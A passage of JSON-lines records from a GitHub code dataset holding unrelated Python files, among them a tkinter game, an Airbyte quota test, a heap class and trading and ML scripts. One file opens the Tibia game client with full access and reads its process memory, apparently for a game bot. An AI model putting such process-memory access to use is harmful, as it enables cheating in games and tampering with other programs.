dispatch.pub(EVENT_TRACE,\"exception\",repr(err),**kwargs)\n\ndef trace_exception(etype, value, tb):\n errmsg = \"\".join(traceback.format_exception(etype, value, tb))\n error(errmsg,trace=\"exception\")\n\nsys.excepthook = trace_exception\n","repo_name":"talkincode/toughlib","sub_path":"toughlib/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"24181863372","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import messagebox as tmsg\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nfrom PIL import ImageTk,Image\nimport random\ny=tk.Tk()\ny.geometry(\"350x500\")\n\ndef hi ():\n\t f=open(\"highscore.txt\",\"r\")\n\t t=f.read()\n\t \n\t a=tmsg.showinfo(\"S_C\",\"heigh score =\"+t)\n\t\n#functions\nf=open(\"highscore.txt\",\"r\")\nt=f.read()\nt=int(t)\ndef reset():\n\tcmp.set(0)\n\tpl.set(0)\n\tcmscore.config(textvariable=cmp)\n\tplscore.config(textvariable=pl)\ndef help():\n a=tmsg.showinfo(\"help\",\"hasnain will help you\")\ndef rate():\n a=tmsg.askquestion(\"was your experience good\",\"was you experience good\")\n if a==\"yes\":\n tmsg.showinfo(\"nice\",\"rate us on playstore\")\n else:\n tmsg.showinfo(\"ohh no\",\"tell us whats wrong we will fix\")\n\ndef te():\n y.configure(bg=\"teal\")\n fb.configure(bg=\"teal\")\ndef pu():\n y.configure(bg=\"purple\")\ndef wall():\n y.configure(bg=\"teal\")\ndef gr():\n y.configure(bg=\"gray\")\ndef ora():\n y.configure(bg=\"#6b59b6\") \n \n \n #images\n \ny.configure(bg=\"#6b59b6\")\nf=Frame(y).place(x=0,y=0)\n#r2=ImageTk.PhotoImage(file=\"bd2.jpg\")\n#global com\n#background=Label(y,image=r2,bd=0).place(x=0,y=0)\ny.title(\"game\")\nglobal p22\np22=ImageTk.PhotoImage(file=\"p222.jpg\")\nglobal s22\ns22=ImageTk.PhotoImage(file=\"s222.jpg\")\nglobal r22\t\nr22=ImageTk.PhotoImage(Image.open(\"r222.jpg\"))\n\nplay=Label(y,image=p22,bd=0)\nplay.place(x=430,y=300)\n\n\n\n#main functions\ndef sei():\n\tglobal com\n\tglobal play\n\tc=cmp.get()\n\tl=pl.get()\n\ta=random.randrange(1,4)\n\tif a==1:\n\t\t\t#c=c+1\n\t\t#cmp.set(c)\n\t\tl=l+1\n\t\tpl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"you win\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=p22)\n\t\tplay.config(image=s22)\n\tif a==2:\n\t\t#cmscore.config(textvariable=cm)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\" Draw\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=s22)\n\t\tplay.config(image=s22)\n\tif a==3:\n\t\tc=c+1\n\t\tcmp.set(c)\n\t\t#l=l+1\n\t\t#pl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t#\tcmscore.config(textvariable=cm)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"you lose\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=r22)\n\t\tplay.config(image=s22)\n\tif l > t:\n f=open(\"highscore.txt\",\"w\")\n f.write(str(l))\n f.close()\n\n\ndef rock ():\n\tglobal com\n\tglobal play\n\t#cmp global\n\tc=cmp.get()\n\tl=pl.get()\n\t\n\t\n\ta=random.randrange(1,4)\n\tif a==1:\n\t\t\t#c=c+1\n\t\t#cmp.set(c)\n\t\tl=l+1\n\t\tpl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\t\n\t\t\n\t\twi.set(\"you win\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=p22)\n\t\tplay.config(image=r22)\n\tif a==2:\n\t\t#c=c+1\n\t\t#cmp.set(c)\n\t\tl=l+1\n\t\tpl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"you win\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=s22)\n\t\tplay.config(image=r22)\n\tif a==3:\n\t\n\t\twi.set(\" Draw\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=r22)\n\t\tplay.config(image=r22)\n\tif l > t:\n f=open(\"highscore.txt\",\"w\")\n f.write(str(l))\n f.close()\n\ndef pap():\n\tglobal com\n\tglobal play\n\tc=cmp.get()\n\tl=pl.get()\n\ta=random.randrange(1,4)\n\tif a==1:\n\t\twi.set(\" Draw\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=p22)\n\t\tplay.config(image=p22)\n\tif a==2:\n\t\tc=c+1\n\t\tcmp.set(c)\n\t\t#l=l+1\n\t\t#pl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"You lose\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=s22)\n\t\tplay.config(image=p22)\n\tif a==3:\n\t\tc=c+1\n\t\tcmp.set(c)\n\t\t#l=l+1\n\t\t#pl.set(l)\n\t\tcmscore.config(textvariable=cmp)\n\t\tplscore.config(textvariable=pl)\n\t\twi.set(\"You lose\")\n\t\twin.config(textvariable=wi)\n\t\tcomp_img.config(image=r22)\n\t\tplay.config(image=p22)\n\t\t\n\tif l > t:\n f=open(\"highscore.txt\",\"w\")\n f.write(str(l))\n f.close()\n\t\ndef exit():\n\ty.destroy()\n\tpass\n\t\n\t\nfb=Label(y,text=\"paper seisor and rock\",fg=\"white\",bg=\"#6b59b6\",font=\"comiscansms 18 bold\")\nfb.pack(fill=X,pady=6)\n\n\n\n#labels\ncomp_img=tk.Label(y,image=p22)\ncomp_img.place(x=20,y=300)\n\n\nf=Label(y,text=\"computer\",fg=\"white\",bg=\"#6b59b6\",font=\"comiscansms 15 bold\")\nf.place(x=20,y=200)\nf=Label(y,text=\"vs\",fg=\"white\",bg=\"#6b59b6\",font=\"comiscansms 15 bold\")\nf.place(x=340,y=400)\n\nwi=StringVar()\nwi.set(\"who win?\")\nwin=Label(y,textvariable=wi,fg=\"white\",font=\"comiscansms 15 bold\",bd=0,bg=\"#6b59b6\",pady=10)\nwin.place(x=240,y=740)\nfhjb=Label(y,text=\"player\",fg=\"white\",bg=\"#6b59b6\",font=\"comiscansms 15 bold\",width=7)\nfhjb.place(x=480,y=200)\npaper=Button(y,text=\"Paper\",width=13,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"red\",command=pap).place(x=20,y=1000)\nseisor=Button(y,text=\"Seisor\",width=13,font=\"comiscansms 9 bold\",fg=\"red\",bg=\"yellow\",command=sei).place(x=380,y=1000)\nrock=Button(y,text=\"Rock\",width=16,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"orange\",command=rock).place(x=150,y=1120)\nreset=Button(y,text=\"Restart\",width=9,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"teal\",command=reset).place(x=260,y=1300)\nexit=Button(y,text=\"Exit\",width=5,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"teal\",command=exit)\nexit.place(x=520,y=1380)\nhighscore=Button(y,text=\"heigh score\",width=8,font=\"comiscansms 9 bold\",fg=\"white\",bg=\"teal\",command=hi).place(x=20,y=1380)\ncmp=IntVar()\ncmp.set(0)\ncmscore=Label(y,textvariable=cmp,font=\"comiscansms 18 bold\",bg=\"#6b59b6\",fg=\"white\")\ncmscore.place(x=50,y=740)\npl=IntVar()\npl.set(0)\nplscore=Label(y,textvariable=pl,font=\"comiscansms 18 bold\",bg=\"#6b59b6\",fg=\"white\")\nplscore.place(x=620,y=740)\n\n\n#menues\n \nmenu2=Menu(y)\nm1=Menu(menu2,tearoff=0)\nm1.add_command(label=\"teal\",command=te)\nm1.add_command(label=\"purple\",command=pu)\nm1.add_command(label=\"wall\",command=wall)\nm1.add_command(label=\"gray\",command=gr)\nm1.add_command(label=\"orange\",command=ora)\nmenu2.add_cascade(label=\"background colour change\",menu=m1)\nmenu2.add_command(label=\"help\",command=help)\nmenu2.add_command(label=\"Rate us\",command=rate)\ny.config(menu=menu2) \nmenu2=Menu(y)\nm1=Menu(menu2,tearoff=0)\nm1.add_command(label=\"teal\",command=te)\nm1.add_command(label=\"purple\",command=pu)\nm1.add_command(label=\"wall\",command=wall)\nm1.add_command(label=\"gray\",command=gr)\nm1.add_command(label=\"Default colur\",command=ora)\nmenu2.add_cascade(label=\"background colour change\",menu=m1)\nmenu2.add_command(label=\"help\",command=help)\nmenu2.add_command(label=\"Rate us\",command=rate)\ny.config(menu=menu2)\n\n\ny.mainloop()\n","repo_name":"Hasnain-Rajpoot/paper_seisor-and-rock","sub_path":"new_final_game/final game.py","file_name":"final game.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20203175741","text":"import pytest\nimport requests\nfrom source_google_analytics_data_api.api_quota import GoogleAnalyticsApiQuota\n\nTEST_QUOTA_INSTANCE: GoogleAnalyticsApiQuota = GoogleAnalyticsApiQuota()\n\n\n@pytest.fixture(name=\"expected_quota_list\")\ndef expected_quota_list():\n \"\"\"The Quota were currently handle\"\"\"\n return [\"concurrentRequests\", \"tokensPerProjectPerHour\", \"potentiallyThresholdedRequestsPerHour\"]\n\n\ndef test_check_initial_quota_is_empty():\n \"\"\"\n Check the initial quota property is empty (== None), but ready to be fullfield.\n \"\"\"\n assert not TEST_QUOTA_INSTANCE.initial_quota\n\n\n@pytest.mark.parametrize(\n (\"response_quota\", \"partial_quota\", \"should_retry_exp\", \"backoff_time_exp\", \"raise_on_http_errors_exp\", \"stop_iter_exp\"),\n [\n # Full Quota\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\"consumed\": 0, \"remaining\": 10},\n \"tokensPerProjectPerHour\": {\"consumed\": 1, \"remaining\": 1735},\n \"potentiallyThresholdedRequestsPerHour\": {\"consumed\": 1, \"remaining\": 26},\n }\n },\n False,\n True,\n None,\n True,\n False,\n ),\n # Partial Quota\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\"consumed\": 0, \"remaining\": 10},\n \"tokensPerProjectPerHour\": {\"consumed\": 5, \"remaining\": 955},\n \"potentiallyThresholdedRequestsPerHour\": {\"consumed\": 3, \"remaining\": 26},\n }\n },\n True,\n True,\n None,\n True,\n False,\n ),\n # Running out `tokensPerProjectPerHour`\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\"consumed\": 2, \"remaining\": 8},\n \"tokensPerProjectPerHour\": {\n \"consumed\": 5,\n # ~9% from original quota is left\n \"remaining\": 172,\n },\n \"potentiallyThresholdedRequestsPerHour\": {\"consumed\": 3, \"remaining\": 26},\n }\n },\n True,\n True,\n 1800,\n False,\n False,\n ),\n # Running out `concurrentRequests`\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\n \"consumed\": 9,\n # 10% from original quota is left\n \"remaining\": 1,\n },\n \"tokensPerProjectPerHour\": {\"consumed\": 5, \"remaining\": 935},\n \"potentiallyThresholdedRequestsPerHour\": {\"consumed\": 1, \"remaining\": 26},\n }\n },\n True,\n True,\n 30,\n False,\n False,\n ),\n # Running out `potentiallyThresholdedRequestsPerHour`\n (\n {\n \"propertyQuota\": {\n \"concurrentRequests\": {\"consumed\": 1, \"remaining\": 9},\n \"tokensPerProjectPerHour\": {\"consumed\": 5, \"remaining\": 935},\n \"potentiallyThresholdedRequestsPerHour\": {\n # 7% from original quota is left\n \"consumed\": 26,\n \"remaining\": 2,\n },\n }\n },\n True,\n True,\n 1800,\n False,\n False,\n ),\n ],\n ids=[\n \"Full\",\n \"Partial\",\n \"Running out tokensPerProjectPerHour\",\n \"Running out concurrentRequests\",\n \"Running out potentiallyThresholdedRequestsPerHour\",\n ],\n)\ndef test_check_full_quota(\n requests_mock,\n expected_quota_list,\n response_quota,\n partial_quota,\n should_retry_exp,\n backoff_time_exp,\n raise_on_http_errors_exp,\n stop_iter_exp,\n):\n \"\"\"\n Check the quota and prepare the initial values for subsequent comparison with subsequent response calls.\n The default values for the scenario are expected when the quota is full.\n \"\"\"\n # Prepare instance\n url = \"https://analyticsdata.googleapis.com/v1beta/\"\n payload = response_quota\n requests_mock.post(url, json=payload)\n response = requests.post(url)\n # process and prepare the scenario\n TEST_QUOTA_INSTANCE._check_quota(response)\n\n # TEST BLOCK\n\n # Check the INITIAL QUOTA is saved properly\n assert [quota in expected_quota_list for quota in TEST_QUOTA_INSTANCE.initial_quota.keys()]\n\n # Check the CURRENT QUOTA is different from Initial\n if partial_quota:\n current_quota = TEST_QUOTA_INSTANCE._get_known_quota_from_response(response.json().get(\"propertyQuota\"))\n assert not current_quota == TEST_QUOTA_INSTANCE.initial_quota\n\n # Check the scenario is applied based on Quota Values\n # should_retry\n assert TEST_QUOTA_INSTANCE.should_retry is should_retry_exp\n # backoff_time\n assert TEST_QUOTA_INSTANCE.backoff_time == backoff_time_exp\n # raise_on_http_errors\n assert TEST_QUOTA_INSTANCE.raise_on_http_errors is raise_on_http_errors_exp\n # stop_iter\n assert TEST_QUOTA_INSTANCE.stop_iter is stop_iter_exp\n","repo_name":"airbytehq/airbyte","sub_path":"airbyte-integrations/connectors/source-google-analytics-data-api/unit_tests/test_api_quota.py","file_name":"test_api_quota.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":12323,"dataset":"github-code","pt":"35"} +{"seq_id":"19185653656","text":"fn=open('D:/anjumca/pg/abc.txt','r')\r\nfn1=open('aa.txt','w+')\r\ncont=fn.readlines()\r\nprint(cont)\r\nfor i in range(0, len(cont)):\r\n\tif(i % 2 ==0):\r\n\t\tfn1.write(cont[i])\r\n\telse:\r\n\t\tcontinue\r\nfn1.close()\r\nfn1=open('aa.txt','r')\r\nprint(fn1.read())\r\nfn1.close()","repo_name":"Anjukpaul/PYTHON","sub_path":"file3.py","file_name":"file3.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28843350828","text":"import ctypes, win32ui, win32gui, win32process, win32api, clientprocess, control, pprint\n\n\nclass Memory:\n def __init__(self):\n PROCESS_ALL_ACCESS = 0x1F0FFF\n self.rPM = ctypes.windll.kernel32.ReadProcessMemory\n self.wPM = ctypes.windll.kernel32.WriteProcessMemory\n self.CLIENT = self.getClientByConsole()\n self.HANDLE = win32api.OpenProcess(PROCESS_ALL_ACCESS, 0, self.CLIENT.pid[1])\n self.BASEADDRESSLIST = win32process.EnumProcessModulesEx(self.HANDLE.handle)\n for BA in self.BASEADDRESSLIST:\n if \"Qt5Core.dll\" in win32process.GetModuleFileNameEx(self.HANDLE.handle, BA):\n self.QT5CORE = BA\n elif \"client.exe\" in win32process.GetModuleFileNameEx(self.HANDLE.handle, BA):\n self.MAINMODULE = BA\n self.BASEADDRESS = self.BASEADDRESSLIST[0]\n\n def dump(self):\n print()\n print(\"HWND : \" + str(self.CLIENT.hwnd))\n print(\"PID : \" + str(self.CLIENT.pid))\n print(\"HANDLE : \" + str(self.HANDLE.handle))\n print(\"BASEADDRESS : \" + str(self.BASEADDRESS))\n\n def getWindowTitle(self, hwid):\n return win32gui.GetWindowText(hwid)\n\n def getDefaultTibiaHandle(self):\n return self.gettibiahandle()[0].GetSafeHwnd()\n\n def getClientByConsole(self):\n clientList = self.gettibiaclients()\n iter = 0\n if len(clientList) == 1:\n return clientList[0]\n else:\n for Client in clientList:\n print(str(iter) + \": \" + win32gui.GetWindowText(Client.hwnd))\n iter += 1\n res = input(\"Select a client: \")\n print(\"You selected client \" + win32gui.GetWindowText(clientList[int(res)].hwnd))\n return clientList[int(res)]\n\n @staticmethod\n def gettibiaclients():\n clientList = []\n i = 0\n for Client in Memory.gettibiahandle():\n clientList.insert(i, clientprocess.ClientProcess(Client, win32gui.GetWindowText(Client), win32process.GetWindowThreadProcessId(Client)))\n i += 1\n return clientList\n\n\n @staticmethod\n def gettibiahandle():\n hwndList = []\n currentHwnd = win32ui.FindWindowEx(None, None, \"Qt5QWindowOwnDCIcon\", None).GetSafeHwnd()\n hwndList.insert(0, currentHwnd)\n i = 1\n while currentHwnd != None:\n try:\n currentHwnd = win32ui.FindWindowEx(None, currentHwnd, \"Qt5QWindowOwnDCIcon\", None).GetSafeHwnd()\n hwndList.insert(i, currentHwnd)\n except win32ui.error:\n currentHwnd = None\n i += 1\n return hwndList\n\n def readString(self, Address, Len):\n bytesread = ctypes.c_ulong(0)\n buff = ctypes.create_string_buffer(Len)\n self.rPM(self.HANDLE.handle, Address, ctypes.byref(buff), Len, ctypes.byref(bytesread))\n print(bytesread.value)\n val = ctypes.string_at(buff, Len).decode(\"utf-16\")\n return val\n\n def readIntDirect(self, Address):\n val = ctypes.c_long()\n buffersize = ctypes.sizeof(val)\n bytesread = ctypes.c_ulong(0)\n self.rPM(self.HANDLE.handle, Address, ctypes.byref(val), buffersize, ctypes.byref(bytesread))\n return val\n\n def readShortDirect(self, Address):\n val = ctypes.c_ushort()\n buffersize = ctypes.sizeof(val)\n bytesread = ctypes.c_ulong(0)\n self.rPM(self.HANDLE.handle, Address, ctypes.byref(val), buffersize, ctypes.byref(bytesread))\n #print(type(val.value))\n return val\n\n def readPtrInt(self, Address):\n data = ctypes.c_long(0)\n iter = 0\n for i in Address:\n if iter == 0:\n toread = ctypes.c_long(i + self.QT5CORE).value\n data = self.readIntDirect(toread)\n iter += 1\n elif iter == len(Address) - 1:\n toread = ctypes.c_long(data.value + i).value\n data = self.readIntDirect(toread)\n return data.value\n else:\n toread = ctypes.c_long(data.value + i).value\n data = self.readIntDirect(toread)\n iter += 1\n\n def readPtrShort(self, Address):\n data = ctypes.c_long(0)\n iter = 0\n for i in Address:\n if iter == 0:\n toread = ctypes.c_long(i + self.QT5CORE).value\n data = self.readIntDirect(toread)\n iter += 1\n elif iter == len(Address) - 1:\n res = ctypes.c_short(0)\n toread = ctypes.c_long(data.value + i).value\n res = self.readShortDirect(toread)\n return res.value\n else:\n toread = ctypes.c_long(data.value + i).value\n data = self.readIntDirect(toread)\n iter += 1","repo_name":"TheJoshGriffith/PythonHealer","sub_path":"memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30787198747","text":"start = 'a b c d e f g h i j k l m n o p'.split()\norder = 'a b c d e f g h i j k l m n o p'.split()\nseen = []\n\ninstructions = input().strip().split(',')\n\nfor i in range(1000000000):\n for instruction in instructions:\n move = instruction[0]\n if move == 's':\n size = int(instruction[1:])\n order = order[-size:] + order[:-size]\n \n elif move == 'x':\n pos1, pos2 = [int(pos) for pos in instruction[1:].split('/')]\n order[pos1], order[pos2] = order[pos2], order[pos1] \n \n elif move == 'p':\n prog1, prog2 = [prog for prog in instruction[1:].split('/')]\n pos1, pos2 = order.index(prog1), order.index(prog2)\n order[pos1], order[pos2] = order[pos2], order[pos1] \n\n if ''.join(order) not in seen:\n seen.append(''.join(order))\n print(''.join(order), i+1)\n else:\n print()\n print(seen[(1000000000%(i+1))+2])\n break\n","repo_name":"MikosJon/AdventOfCode2017","sub_path":"day16/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19219362046","text":"from typing import List\nfrom xml.etree import ElementTree as ET\n\nfrom .utils import *\nfrom .level import Level\nfrom .exceptions import InvalidXMLData\n\n\nclass LocalLevels:\n\tdef __init__(self, debug=False):\n\t\tself.debug: bool = debug\n\t\tself.levels: List[Level] = []\n\n\tdef dlog(self, text: str):\n\t\tif not self.debug:\n\t\t\treturn\n\n\t\tprint(f\"[DEBUG][LLS]: {text}\")\n\n\tdef load_file(self, file: str):\n\t\tfile = open(file, \"rb\")\n\t\tdata = file.read()\n\n\t\tdata = decrypt_level(data)\n\t\tself.dlog(data)\n\t\troot = ET.fromstring(data)\n\n\t\tlevels_root = root.find(\"dict\").find(\"d\")\n\t\tfor level_data in levels_root.findall(\"d\"):\n\t\t\tkey_found = False\n\t\t\tkey_name = \"\"\n\t\t\tvalues = {}\n\n\t\t\tfor elem in level_data.iter():\n\t\t\t\tif elem.tag == \"k\":\n\t\t\t\t\tif key_found:\n\t\t\t\t\t\traise InvalidXMLData(\"key is found after another key\")\n\n\t\t\t\t\tkey_name = elem.text\n\t\t\t\t\tkey_found = True\n\t\t\t\telif key_found:\n\t\t\t\t\tvalues[key_name] = elem.text\n\t\t\t\t\tkey_found = False\n\n\t\t\tlevel = Level()\n\t\t\tlevel.load(values)\n\t\t\tself.levels.append(level)\n\n\t\tfile.close()\n\n\tdef save_file(self, file: str):\n\t\traw_levels_data = []\n\n\t\tfor level in self.levels:\n\t\t\traw_levels_data.append(level.save())\n\n\t\tlevels_data = \\\n\t\t\t\"\" \\\n\t\t\t\"\" \\\n\t\t\t\"\" \\\n\t\t\t\"LLM_01\" \\\n\t\t\t\"\" \\\n\t\t\t\"_isArr\" \\\n\t\t\t\"\".encode()\n\t\tlevel_id = 0\n\n\t\tfor level_data in raw_levels_data:\n\t\t\tlevels_data += f\"k_{level_id}\".encode()\n\t\t\tlevels_data += level_data\n\n\t\t\tlevel_id += 1\n\n\t\tlevels_data += \\\n\t\t\t\"\" \\\n\t\t\t\"LLM_02\" \\\n\t\t\t\"35\" \\\n\t\t\t\"\" \\\n\t\t\t\"\".encode()\n\n\t\tlevels_data = encrypt_level(levels_data)\n\n\t\tf = open(file, \"wb\")\n\t\tf.write(levels_data)\n","repo_name":"Myr-13/gdapi","sub_path":"gdapi/local_levels.py","file_name":"local_levels.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9766920052","text":"import re\n\nfrom core.providers import INPUT_PROVIDERS\n\n\nclass MusicUrl(object):\n def __init__(self, url, provider=None):\n self.url = url\n\n self.__provider = provider\n\n @property\n def provider(self):\n if self.__provider is None:\n self.__provider = self.__get_provider()\n \n return self.__provider\n\n def __get_provider(self):\n for provider_cls in INPUT_PROVIDERS:\n if provider_cls.is_music_url(self.url):\n return provider_cls()\n\n raise ValueError(f'Unable to find provider for {self.url}')\n\n def get_name(self):\n return self.provider.get_music_name(self.url)\n\n\nclass UrlsExtractor(object):\n URL_REGEX = re.compile(r'(https?://[^\\s]+)')\n\n @classmethod\n def get_urls(cls, message):\n for match in cls.URL_REGEX.finditer(message):\n yield match.group(1)\n\n @classmethod\n def get_music_urls(cls, message):\n urls = cls.get_urls(message)\n unique_urls = set()\n for url in urls:\n if url not in unique_urls:\n unique_urls.add(url)\n music_url = cls.__to_music_url(url)\n if music_url:\n yield music_url\n\n @classmethod\n def __to_music_url(cls, url):\n \"\"\"\n Returns instance of MusicUrl with provider if possible\n :param url: url to parse\n :return: MusicUrl\n \"\"\"\n for provider in INPUT_PROVIDERS:\n if provider.is_music_url(url):\n return MusicUrl(url, provider())\n","repo_name":"Ignisor/music-share-bot","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"35507164178","text":"import MetaTrader5 as mt5\nimport datetime as dt\nimport time\n\nmt5.initialize()\n\nposition = mt5.positions_get(symbol='USDTRY')\n# print(position)\n\ndef profit(position):\n\n if position[0].type == 0: #For long positions\n type_ = mt5.ORDER_TYPE_BUY\n else:\n type_ = mt5.ORDER_TYPE_SELL\n\n profit = mt5.order_calc_profit(type_, position[0].symbol, position[0].volume, position[0].price_open, position[0].sl)\n return profit\n\nk = profit(position)\nprint(k)\n\nmt5.shutdown()","repo_name":"Kiran-Sawant/Risk-Monitor","sub_path":"temp_scripts/calc_profit.py","file_name":"calc_profit.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"37848440561","text":"\"\"\"\nHeap (min-heap) implementation example\n\"\"\"\n\nfrom random import sample\n\n\nHEAP_SIZE = 20\n\n\nclass EmptyHeapError(Exception):\n def __init__(self):\n super().__init__(\"No elements in the heap\")\n\n\nclass Heap:\n def __init__(self):\n self.__heap = [0]\n\n @property\n def size(self) -> int:\n return len(self.__heap) - 1\n\n def __len__(self) -> int:\n return self.size\n\n @property\n def is_empty(self) -> bool:\n return self.size <= 0\n\n def insert(self, item: int) -> None:\n self.__heap.append(item)\n self.arrange(self.size)\n\n def __iter__(self):\n self.__current = 0\n return self\n\n def __next__(self):\n self.__current += 1\n if not self.is_empty:\n return self.__heap[self.__current]\n else:\n raise StopIteration\n\n def arrange(self, index: int) -> None:\n \"\"\"Rebalances tree\"\"\"\n parent_index = index // 2\n if parent_index <= 0:\n return\n if self.__heap[index] < self.__heap[parent_index]:\n self.__heap[index], self.__heap[parent_index] = (\n self.__heap[parent_index],\n self.__heap[index],\n )\n self.arrange(parent_index)\n\n def _child_min_index(self, index: int) -> int:\n \"\"\"Finds child min index that has min value\n\n For instance two children 10, 6 with indexes 3, 4\n will return index 4\n \"\"\"\n l_index = index * 2\n r_index = l_index + 1\n if self.size < r_index:\n return l_index\n return l_index if self.__heap[l_index] < self.__heap[r_index] else r_index\n\n def sink(self, index: int) -> None:\n \"\"\"Rebalances the tree when item is popped\"\"\"\n child_index = self._child_min_index(index)\n if self.size < child_index:\n return\n if self.__heap[child_index] < self.__heap[index]:\n self.__heap[index], self.__heap[child_index] = (\n self.__heap[child_index],\n self.__heap[index],\n )\n self.sink(child_index)\n\n def pop(self) -> int:\n \"\"\"Pop root (lowest element) of the tree\"\"\"\n if self.is_empty:\n raise EmptyHeapError()\n item = self.__heap[1]\n # get latest element in the heap and put it to the root of the tree\n last_item = self.__heap.pop()\n if not self.is_empty:\n self.__heap[1] = last_item\n # rebalance a tree\n self.sink(1)\n return item\n\n def clear(self):\n self.__heap = [0]\n\n def __repr__(self):\n return str(self.__heap[1:])\n\n\ndef main():\n heap = Heap()\n assert heap.size == len(heap) == 0\n assert heap.is_empty is True\n\n items = [i for i in sample(range(100), HEAP_SIZE)]\n for item in items:\n heap.insert(item)\n\n assert heap.size == len(heap) == HEAP_SIZE\n print(f\"items: {items}\")\n print(f\"heap: {heap}\")\n\n heap.clear()\n assert heap.is_empty is True\n assert heap.size == 0\n\n items = [4, 8, 7, 2, 9, 10, 5, 1, 3, 6]\n for item in items:\n heap.insert(item)\n print(f\"item: {item}, heap: {heap}\")\n\n while not heap.is_empty:\n item = heap.pop()\n print(f\"item: {item}, heap: {heap}\")\n\n try:\n heap.pop()\n assert False, \"Failed. There are no elements in the heap\"\n except EmptyHeapError as ex:\n print(f\"Exeption: {ex}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vlad-bezden/data_structures_and_algorithms","sub_path":"data_structures_and_algorithms/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32213189235","text":" \nimport torch\nimport torch.nn.functional as F\nfrom cam.basecam import *\nimport math\n\nclass ScoreCAM(BaseCAM):\n\n \"\"\"\n ScoreCAM, inherit from BaseCAM\n \"\"\"\n\n def __init__(self, model_dict):\n super().__init__(model_dict)\n\n def forward(self, input, class_idx=None, retain_graph=False):\n b, c, h, w = input.size()\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.input_ = input\n # predication on raw input\n logit = self.model_arch(input).cuda()\n \n if class_idx is None:\n predicted_class = logit.max(1)[-1]\n self.class_idx = predicted_class\n score = logit[:, logit.max(1)[-1]].squeeze()\n else:\n predicted_class = torch.LongTensor([class_idx])\n self.class_idx = predicted_class\n score = logit[:, class_idx].squeeze()\n \n logit = F.softmax(logit, dim=-1)\n\n if torch.cuda.is_available():\n predicted_class= predicted_class.cuda()\n score = score.cuda()\n logit = logit.cuda()\n\n self.model_arch.zero_grad()\n\n activations = self.activations['value']\n b, k, u, v = activations.size()\n \n score_saliency_map = torch.zeros((1, 1, h, w))\n\n if torch.cuda.is_available():\n activations = activations.cuda()\n score_saliency_map = score_saliency_map.cuda()\n\n with torch.no_grad():\n norm_saliency_maps = torch.zeros(k,1,224,224)\n for i in range(k):\n\n # upsampling\n saliency_map = torch.unsqueeze(activations[:, i, :, :], 1)\n saliency_map = F.interpolate(saliency_map, size=(h, w), mode='bilinear', align_corners=False)\n \n if saliency_map.max() == saliency_map.min():\n continue\n \n # normalize to 0-1\n norm_saliency_map = (saliency_map - saliency_map.min()) / (saliency_map.max() - saliency_map.min())\n norm_saliency_maps[i:i+1] = norm_saliency_map\n # how much increase if keeping the highlighted region\n # predication on masked input\n score_list = torch.zeros(k)\n # divide batch\n last_idx = -1\n batch_size = 32\n N = k\n for i in range(math.floor(N/batch_size)):\n mask_batch = norm_saliency_maps[i*batch_size:(i+1)*batch_size]\n target_score = self.BatchScoreComputation(mask_batch)\n score_list[i*batch_size:(i+1)*batch_size] = target_score\n last_idx = i\n # last batch\n if (last_idx+1)*batch_size < N:\n mask_batch = norm_saliency_maps[(last_idx+1)*batch_size:]\n target_score = self.BatchScoreComputation(mask_batch)\n score_list[(last_idx+1)*batch_size:] = target_score\n\n\n score_saliency_map = torch.sum(score_list.reshape(-1, 1, 1, 